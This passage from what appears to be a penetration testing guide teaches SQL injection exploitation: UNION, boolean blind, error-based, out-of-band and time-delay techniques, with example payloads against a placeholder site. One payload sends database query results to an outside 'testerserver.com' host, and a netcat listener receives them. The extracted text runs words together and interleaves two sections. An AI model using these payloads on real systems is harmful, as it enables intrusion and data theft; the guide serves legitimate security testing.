112Web Application Penetration TestingAll cells in a column must have the same datatypeIf the query executes with success, the first column can be an integer.Then the tester can move further and so on:http:/www.example.com/product.php?id=10 UNION SELECT1,1,null--After the successful information gathering, depending on the application,it may only show the tester the first result, because theapplication treats only the first line of the result set. In this case,it is possible to use a LIMIT clause or the tester can set an invalidvalue, making only the second query valid (supposing there is noentry in the database which ID is 99999):http:/www.example.com/product.php?id=99999 UNIONSELECT 1,1,null--Boolean Exploitation TechniqueThe Boolean exploitation technique is very useful when the testerfinds a Blind SQL Injection situation, in which nothing is known onthe outcome of an operation. For example, this behavior happensin cases where the programmer has created a custom error pagethat does not reveal anything on the structure of the query or onthe database. (The page does not return a SQL error, it may justreturn a HTTP 500, 404, or redirect).By using inference methods, it is possible to avoid this obstacleand thus to succeed in recovering the values of some desiredfields. This method consists of carrying out a series of booleanqueries against the server, observing the answers and finallydeducing the meaning of such answers. We consider, as always,the www.example.com domain and we suppose that it contains aparameter named id vulnerable to SQL injection. This means thatcarrying out the following request:http:/www.example.com/index.php?id=1’We will get one page with a custom message error which is due toa syntactic error in the query. We suppose that the query executedon the server is:SELECT field1, field2, field3 FROM Users WHERE Id=’$Id’Which is exploitable through the methods seen previously. Whatwe want to obtain is the values of the username field. The teststhat we will execute will allow us to obtain the value of the usernamefield, extracting such value character by character. This ispossible through the use of some standard functions, present inpractically every database. For our examples, we will use the followingpseudo-functions:SUBSTRING (text, start, length): returns a substring starting fromthe position “start” of text and of length “length”. If “start” is greater than the length of text, the function returns anull value.ASCII (char): it gives back ASCII value of the input character. A nullvalue is returned if char is 0.LENGTH (text): it gives back the number of characters in the inputtext.Through such functions, we will execute our tests on the firstcharacter and, when we have discovered the value, we will passto the second and so on, until we will have discovered the entirevalue. The tests will take advantage of the function SUBSTRING,in order to select only one character at a time (selecting a singlecharacter means to impose the length parameter to 1), and thefunction ASCII, in order to obtain the ASCII value, so that we can donumerical comparison. The results of the comparison will be donewith all the values of the ASCII table, until the right value is found.As an example, we will use the following value for Id:$Id=1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1That creates the following query (from now on, we will call it “inferentialquery”):SELECT field1, field2, field3 FROM Users WHERE Id=’1’ ANDASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1’The previous example returns a result if and only if the first characterof the field username is equal to the ASCII value 97. If we geta false value, then we increase the index of the ASCII table from97 to 98 and we repeat the request. If instead we obtain a truevalue, we set to zero the index of the ASCII table and we analyzethe next character, modifying the parameters of the SUBSTRINGfunction. The problem is to understand in which way we can distinguishtests returning a true value from those that return false.To do this, we create a query that always returns false. This is possibleby using the following value for Id:$Id=1’ AND ‘1’ = ‘2Which will create the following query:SELECT field1, field2, field3 FROM Users WHERE Id=’1’ AND ‘1’= ‘2’The obtained response from the server (that is HTML code) will bethe false value for our tests. This is enough to verify whether thevalue obtained from the execution of the inferential query is equalto the value obtained with the test executed before.Sometimes, this method does not work. If the server returns twodifferent pages as a result of two identical consecutive web requests,we will not be able to discriminate the true value fromthe false value. In these particular cases, it is necessary to useparticular filters that allow us to eliminate the code that changesbetween the two requests and to obtain a template. Later on,for every inferential request executed, we will extract the relativetemplate from the response using the same function, and we willperform a control between the two templates in order to decidethe result of the test.
113Web Application Penetration TestingIn the previous discussion, we haven’t dealt with the problem ofdetermining the termination condition for out tests, i.e., when weshould end the inference procedure.A techniques to do this uses one characteristic of the SUBSTRINGfunction and the LENGTH function. When the test compares thecurrent character with the ASCII code 0 (i.e., the value null) and thetest returns the value true, then either we are done with the inferenceprocedure (we have scanned the whole string), or the valuewe have analyzed contains the null character.We will insert the following value for the field Id:$Id=1’ AND LENGTH(username)=N AND ‘1’ = ‘1Where N is the number of characters that we have analyzed up tonow (not counting the null value). The query will be:SELECT field1, field2, field3 FROM Users WHERE Id=’1’ ANDLENGTH(username)=N AND ‘1’ = ‘1’The query returns either true or false. If we obtain true, then wehave completed the inference and, therefore, we know the valueof the parameter. If we obtain false, this means that the nullcharacter is present in the value of the parameter, and we mustcontinue to analyze the next parameter until we find another nullvalue.The blind SQL injection attack needs a high volume of queries. Thetester may need an automatic tool to exploit the vulnerability.Error based Exploitation techniqueAn Error based exploitation technique is useful when the testerfor some reason can’t exploit the SQL injection vulnerability usingother technique such as UNION. The Error based technique consistsin forcing the database to perform some operation in whichthe result will be an error. The point here is to try to extract somedata from the database and show it in the error message. This exploitationtechnique can be different from DBMS to DBMS (checkDBMS specific section).Consider the following SQL query:passed to it, which is other query, the name of the user. When thedatabase looks for a host name with the user database name, itwill fail and return an error message like:ORA-292257: host SCOTT unknownThen the tester can manipulate the parameter passed to GET_HOST_NAME() function and the result will be shown in the errormessage.Out of band Exploitation techniqueThis technique is very useful when the tester find a Blind SQL Injectionsituation, in which nothing is known on the outcome of anoperation. The technique consists of the use of DBMS functions toperform an out of band connection and deliver the results of theinjected query as part of the request to the tester’s server. Like theerror based techniques, each DBMS has its own functions. Checkfor specific DBMS section.Consider the following SQL query:SELECT * FROM products WHERE id_product=$id_productConsider also the request to a script who executes the queryabove:http:/www.example.com/product.php?id=10The malicious request would be:http:/www.example.com/product.php?id=10||UTL_HTTP.request(‘testerserver.com:80’||(SELET user FROM DUAL)--In this example, the tester is concatenating the value 10 with theresult of the function UTL_HTTP.request. This Oracle function willtry to connect to ‘testerserver’ and make a HTTP GET request containingthe return from the query “SELECT user FROM DUAL”. Thetester can set up a webserver (e.g. Apache) or use the Netcat tool:SELECT * FROM products WHERE id_product=$id_productConsider also the request to a script who executes the queryabove:http:/www.example.com/product.php?id=10The malicious request would be (e.g. Oracle 10g):http:/www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--In this example, the tester is concatenating the value 10 with theresult of the function UTL_INADDR.GET_HOST_NAME. This Oraclefunction will try to return the host name of the parameter/home/tester/nc –nLp 80GET /SCOTT HTTP/1.1 Host: testerserver.com Connection: closeTime delay Exploitation techniqueThe Boolean exploitation technique is very useful when the testerfind a Blind SQL Injection situation, in which nothing is known onthe outcome of an operation. This technique consists in sendingan injected query and in case the conditional is true, the tester canmonitor the time taken to for the server to respond. If there is adelay, the tester can assume the result of the conditional query istrue. This exploitation technique can be different from DBMS toDBMS (check DBMS specific section).Consider the following SQL query:SELECT * FROM products WHERE id_product=$id_product